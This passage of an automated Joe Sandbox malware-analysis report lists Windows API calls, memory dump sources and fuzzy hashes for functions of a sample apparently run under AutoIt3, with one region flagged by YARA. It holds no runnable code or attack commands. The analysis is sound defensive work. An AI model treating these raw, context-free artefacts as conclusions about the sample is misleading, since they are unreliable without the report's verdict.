                                      • LoadResource.KERNEL32(?,00000000,?,?,00850817,?,?,00000000,00000000,?,?,?,?,?,?,00814A14), ref: 00869F0F
                                      • SizeofResource.KERNEL32(?,00000000,?,?,00850817,?,?,00000000,00000000,?,?,?,?,?,?,00814A14), ref: 00869F20
                                      • LockResource.KERNEL32(00850817,?,?,00850817,?,?,00000000,00000000,?,?,?,?,?,?,00814A14,00000000), ref: 00869F2F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                      • String ID: SCRIPT
                                      • API String ID: 3051347437-3967369404
                                      • Opcode ID: f9b82c53bf84982e223cbb8091237a12a65ec09103aa047a5736282e3d83c1f2
                                      • Instruction ID: e8a8f6c8e3cd5c31f2f55d133c7f81b8bfdc1c2de196b5f543c6aedec4e26933
                                      • Opcode Fuzzy Hash: f9b82c53bf84982e223cbb8091237a12a65ec09103aa047a5736282e3d83c1f2
                                      • Instruction Fuzzy Hash: 1C115771200701AFEB229B65DC48F277BBDFBC5B11F258269F949D62A0DB71EC04CA60
                                      APIs
                                      • __init_pointers.LIBCMT ref: 00829D16
                                        • Part of subcall function 008233B7: EncodePointer.KERNEL32(00000000), ref: 008233BA
                                        • Part of subcall function 008233B7: __initp_misc_winsig.LIBCMT ref: 008233D5
                                        • Part of subcall function 008233B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0082A0D0
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0082A0E4
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0082A0F7
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0082A10A
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0082A11D
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0082A130
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0082A143
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0082A156
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0082A169
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0082A17C
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0082A18F
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0082A1A2
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0082A1B5
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0082A1C8
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0082A1DB
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0082A1EE
                                      • __mtinitlocks.LIBCMT ref: 00829D1B
                                      • __mtterm.LIBCMT ref: 00829D24
                                        • Part of subcall function 00829D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00829D29,00827EFD,008BCD38,00000014), ref: 00829E86
                                        • Part of subcall function 00829D8C: _free.LIBCMT ref: 00829E8D
                                        • Part of subcall function 00829D8C: DeleteCriticalSection.KERNEL32(008C0C00,?,?,00829D29,00827EFD,008BCD38,00000014), ref: 00829EAF
                                      • __calloc_crt.LIBCMT ref: 00829D49
                                      • __initptd.LIBCMT ref: 00829D6B
                                      • GetCurrentThreadId.KERNEL32 ref: 00829D72
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                      • String ID:
                                      • API String ID: 3567560977-0
                                      • Opcode ID: 54cfeeccca1082c6b68a8f354b95ed6e38195076c17f57fd03fad194b8199225
                                      • Instruction ID: 397ffb701bdc857fec2ade851f81b222416fcd3ab3c95b31e104250521343795
                                      • Opcode Fuzzy Hash: 54cfeeccca1082c6b68a8f354b95ed6e38195076c17f57fd03fad194b8199225
                                      • Instruction Fuzzy Hash: 81F06D3290A731AAE6347B78BC0378A2AD4FF41770F21061AF4E4D51D3EF2089C25592
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,03CC42AE,?,?,?,?,?,?,?,03CC435A,03CC2B1F), ref: 03CC421D
                                      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,03CC42AE,?,?,?,?,?,?,?,03CC435A), ref: 03CC4223
                                      • GetStdHandle.KERNEL32(000000F5,03CC426C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,03CC42AE), ref: 03CC4238
                                      • WriteFile.KERNEL32(00000000,000000F5,03CC426C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,03CC42AE), ref: 03CC423E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileHandleWrite
                                      • String ID: Error$Runtime error at 00000000
                                      • API String ID: 3320372497-2970929446
                                      • Opcode ID: 44f4d8473269ebd51ef61b097cc84371900ccee8ead1e94c652104f26af33de7
                                      • Instruction ID: a5b1db8c38bb53d6f1a01b97702e1f821062af1c56882f37011e9dd0e1f98aa0
                                      • Opcode Fuzzy Hash: 44f4d8473269ebd51ef61b097cc84371900ccee8ead1e94c652104f26af33de7
                                      • Instruction Fuzzy Hash: B7F096B96A43C439E735F6A29D16F9925584B64B15F18420DF270EC4CB86A862C4A621
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00824282,?), ref: 008241D3
                                      • GetProcAddress.KERNEL32(00000000), ref: 008241DA
                                      • EncodePointer.KERNEL32(00000000), ref: 008241E6
                                      • DecodePointer.KERNEL32(00000001,00824282,?), ref: 00824203
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                      • String ID: RoInitialize$combase.dll
                                      • API String ID: 3489934621-340411864
                                      • Opcode ID: 9642248528500c988bb3788565fd735e41c8d777cc07b462d8b04400dd8d4303
                                      • Instruction ID: 1151f6096dcf1fd779d66064573ce3005379442bad9dee054c2b4ec06413aaf5
                                      • Opcode Fuzzy Hash: 9642248528500c988bb3788565fd735e41c8d777cc07b462d8b04400dd8d4303
                                      • Instruction Fuzzy Hash: 16E01270A90711AFEF122FB0EC4DF083AB5FB20B06FA8442AB411D52E4CBB960C49F10
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008241A8), ref: 008242A8
                                      • GetProcAddress.KERNEL32(00000000), ref: 008242AF
                                      • EncodePointer.KERNEL32(00000000), ref: 008242BA
                                      • DecodePointer.KERNEL32(008241A8), ref: 008242D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                      • String ID: RoUninitialize$combase.dll
                                      • API String ID: 3489934621-2819208100
                                      • Opcode ID: f412be70ec603c5c982ed222e9203bf4666668ad1bbf0c40cf6d102ed422bebc
                                      • Instruction ID: b18f276bc8d9ab690cd2fc6427bee0491cce4ad25baa76135758871a561f0f1c
                                      • Opcode Fuzzy Hash: f412be70ec603c5c982ed222e9203bf4666668ad1bbf0c40cf6d102ed422bebc
                                      • Instruction Fuzzy Hash: 53E09970A90B00EFEE11AB62AD0DF443AB4FB00B42F58011BF001E52A0CBF966849E20
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 008021B8
                                      • GetWindowRect.USER32(?,?), ref: 008021F9
                                      • ScreenToClient.USER32(?,?), ref: 00802221
                                      • GetClientRect.USER32(?,?), ref: 00802350
                                      • GetWindowRect.USER32(?,?), ref: 00802369
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Rect$Client$Window$Screen
                                      • String ID:
                                      • API String ID: 1296646539-0
                                      • Opcode ID: 2c0005f3eb7735d19275bde3bb5e87c40ea309c8b816a7ad69ca2f78fd948b93
                                      • Instruction ID: 48049a115d85d5bd01e9eace82a774f5bad2688dc8824c05de2d47a364fca2a6
                                      • Opcode Fuzzy Hash: 2c0005f3eb7735d19275bde3bb5e87c40ea309c8b816a7ad69ca2f78fd948b93
                                      • Instruction Fuzzy Hash: C5B18C79900249DBDF50CFA8C9847EDB7B1FF48314F148129ED59EB294DB70AA50CBA4
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memmove$__itow__swprintf
                                      • String ID:
                                      • API String ID: 3253778849-0
                                      • Opcode ID: 4cd205410e57b1cfe4770abb86cb8707d9e595a90c2a94046b2e1526cc5d573e
                                      • Instruction ID: 06599be231952225cb216b68349f3990492b0ffa6f8d55f176b85f8c71f1e7f9
                                      • Opcode Fuzzy Hash: 4cd205410e57b1cfe4770abb86cb8707d9e595a90c2a94046b2e1526cc5d573e
                                      • Instruction Fuzzy Hash: E861A970500A9AABCF11EF68CC86EFE37A8FF05308F054558F955EB192EB309955CB52
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0088147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0088040D,?,?), ref: 00881491
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0088091D
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0088095D
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00880980
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008809A9
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 008809EC
                                      • RegCloseKey.ADVAPI32(00000000), ref: 008809F9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                      • String ID:
                                      • API String ID: 4046560759-0
                                      • Opcode ID: ecaf2eb5c63f3a8d521792504256ce7cdb73bc3c74e1247fcd7ccebd84f098ae
                                      • Instruction ID: 66e952b09e638514ce842c15355d8582ff6f5156343e4489fc7a05176ea26bc6
                                      • Opcode Fuzzy Hash: ecaf2eb5c63f3a8d521792504256ce7cdb73bc3c74e1247fcd7ccebd84f098ae
                                      • Instruction Fuzzy Hash: 79515831208204AFDB54EF68CC85E6ABBA9FF84314F04491DF595C72A2DB31E949CF92
                                      APIs
                                      • GetMenu.USER32(?), ref: 00885E38
                                      • GetMenuItemCount.USER32(00000000), ref: 00885E6F
                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00885E97
                                      • GetMenuItemID.USER32(?,?), ref: 00885F06
                                      • GetSubMenu.USER32(?,?), ref: 00885F14
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00885F65
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountMessagePostString
                                      • String ID:
                                      • API String ID: 650687236-0
                                      • Opcode ID: bc72a047feb25e304b5bf1a63c1c11a9003f4799fbb6b35eee08a928e8f120cf
                                      • Instruction ID: 7ced1ab8a17b510d5731f38d83db8ffec71aaa1c2bdd1d5cf3c6818e4b6344c3
                                      • Opcode Fuzzy Hash: bc72a047feb25e304b5bf1a63c1c11a9003f4799fbb6b35eee08a928e8f120cf
                                      • Instruction Fuzzy Hash: F3516B75A01A29AFDB11EF68C845AAEB7B5FF48310F154059E911FB391CB30AE418F92
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0085F6A2
                                      • VariantClear.OLEAUT32(00000013), ref: 0085F714
                                      • VariantClear.OLEAUT32(00000000), ref: 0085F76F
                                      • _memmove.LIBCMT ref: 0085F799
                                      • VariantClear.OLEAUT32(?), ref: 0085F7E6
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0085F814
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                      • String ID:
                                      • API String ID: 1101466143-0
                                      • Opcode ID: e98f361c50085659d58ee63d5c8365b567e504bd9bcefd341e0cd984c5897521
                                      • Instruction ID: 902182d2ed5e828dc6b4ee7c3c586cba4478659bfd645fb7bf7b9cf3a1fbfb93
                                      • Opcode Fuzzy Hash: e98f361c50085659d58ee63d5c8365b567e504bd9bcefd341e0cd984c5897521
                                      • Instruction Fuzzy Hash: AD515AB5A00209EFDB14CF58C884AAAB7B8FF4C354B15856AEE59DB301D730E955CFA0
                                      APIs
                                      • _memset.LIBCMT ref: 008629FF
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00862A4A
                                      • IsMenu.USER32(00000000), ref: 00862A6A
                                      • CreatePopupMenu.USER32 ref: 00862A9E
                                      • GetMenuItemCount.USER32(000000FF), ref: 00862AFC
                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00862B2D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                      • String ID:
                                      • API String ID: 3311875123-0
                                      • Opcode ID: c786906c51c17881ca61f6c447681112c37db5d237bc77aa9acfa1feca24a715
                                      • Instruction ID: 8efa4ccd15c2b24d94f1b09e4d2a3f7753217619c9a8e8bfed16b4d9edd8ac11
                                      • Opcode Fuzzy Hash: c786906c51c17881ca61f6c447681112c37db5d237bc77aa9acfa1feca24a715
                                      • Instruction Fuzzy Hash: 1251B070600A59DFCF25CFA8D888BAEBBF4FF44324F154199E811E7291D7B09944CB51
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00801B76
                                      • GetWindowRect.USER32(?,?), ref: 00801BDA
                                      • ScreenToClient.USER32(?,?), ref: 00801BF7
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00801C08
                                      • EndPaint.USER32(?,?), ref: 00801C52
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                      • String ID:
                                      • API String ID: 1827037458-0
                                      • Opcode ID: f3c8132030bd3c15c9ff550648948e86c9b343bdbe087108fe8a54dea60611f2
                                      • Instruction ID: 2d0af0ef7ef03c2f5953557bdef5aa0ccb54a260549f3037b52646155238aacc
                                      • Opcode Fuzzy Hash: f3c8132030bd3c15c9ff550648948e86c9b343bdbe087108fe8a54dea60611f2
                                      • Instruction Fuzzy Hash: 4E415A71104304AFDB11DF28CC88FAA7BF8FB55774F140669FAA5C62A1C7319845DB62
                                      APIs
                                      • ShowWindow.USER32(008C77B0,00000000,00EA5FF8,?,?,008C77B0,?,0088BC1A,?,?), ref: 0088BD84
                                      • EnableWindow.USER32(00000000,00000000), ref: 0088BDA8
                                      • ShowWindow.USER32(008C77B0,00000000,00EA5FF8,?,?,008C77B0,?,0088BC1A,?,?), ref: 0088BE08
                                      • ShowWindow.USER32(00000000,00000004,?,0088BC1A,?,?), ref: 0088BE1A
                                      • EnableWindow.USER32(00000000,00000001), ref: 0088BE3E
                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0088BE61
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: e624cbdf7f5112cad173198250f31f02ef9033329671a6c6730b913ecf88892a
                                      • Instruction ID: 1a12ca95f7cf3c0ae4228e1557df143611c409a0f80cb2dd9e26719fdd0dc97a
                                      • Opcode Fuzzy Hash: e624cbdf7f5112cad173198250f31f02ef9033329671a6c6730b913ecf88892a
                                      • Instruction Fuzzy Hash: F3416C34600645BFDB22EF28C589BD57BE1FF85314F1841A9EA58CF6A2C731AC45CB51
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,0087550C,?,?,00000000,00000001), ref: 00877796
                                        • Part of subcall function 0087406C: GetWindowRect.USER32(?,?), ref: 0087407F
                                      • GetDesktopWindow.USER32 ref: 008777C0
                                      • GetWindowRect.USER32(00000000), ref: 008777C7
                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 008777F9
                                        • Part of subcall function 008657FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865877
                                      • GetCursorPos.USER32(?), ref: 00877825
                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00877883
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                      • String ID:
                                      • API String ID: 4137160315-0
                                      • Opcode ID: 1276df9f121dd01f7657a5f5733e190e9315cbfaedf23cbbd55015789728b094
                                      • Instruction ID: 3763c6a0b70c9afa5cb7d2eaba363f46c6217327f8d50aa34bd89617fdf5a1ab
                                      • Opcode Fuzzy Hash: 1276df9f121dd01f7657a5f5733e190e9315cbfaedf23cbbd55015789728b094
                                      • Instruction Fuzzy Hash: 3231B072508305AFD720EF54D849F9BB7A9FF88314F00492AF599E7191CB30E918CBA6
                                      APIs
                                      • GetDC.USER32(00000000), ref: 03CFE32E
                                      • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 03CFE38D
                                      • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 03CFE3AB
                                      • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 03CFE3BF
                                      • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 03CFE3DF
                                      • ReleaseDC.USER32(00000000,?), ref: 03CFE3F7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EntriesPaletteSystem$Release
                                      • String ID:
                                      • API String ID: 118965383-0
                                      • Opcode ID: f50c1d7664304cfcfcb17974dbe81d20cae5a3c12cfd11c14971bc39639b14c8
                                      • Instruction ID: 324cad7b22584697a30ff93dc4d7962900ebee146c00d9e2b3f759e8eb5b5884
                                      • Opcode Fuzzy Hash: f50c1d7664304cfcfcb17974dbe81d20cae5a3c12cfd11c14971bc39639b14c8
                                      • Instruction Fuzzy Hash: 1521B2B5A10348BFDB50DBA4CE85FAE73ACEB08B00F4104A5FB04EB180D6749F549B21
                                      APIs
                                        • Part of subcall function 00858CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00858CDE
                                        • Part of subcall function 00858CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00858CE8
                                        • Part of subcall function 00858CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00858CF7
                                        • Part of subcall function 00858CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00858CFE
                                        • Part of subcall function 00858CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00858D14
                                      • GetLengthSid.ADVAPI32(?,00000000,0085904D), ref: 00859482
                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0085948E
                                      • HeapAlloc.KERNEL32(00000000), ref: 00859495
                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 008594AE
                                      • GetProcessHeap.KERNEL32(00000000,00000000,0085904D), ref: 008594C2
                                      • HeapFree.KERNEL32(00000000), ref: 008594C9
                                      Memory Dump Source
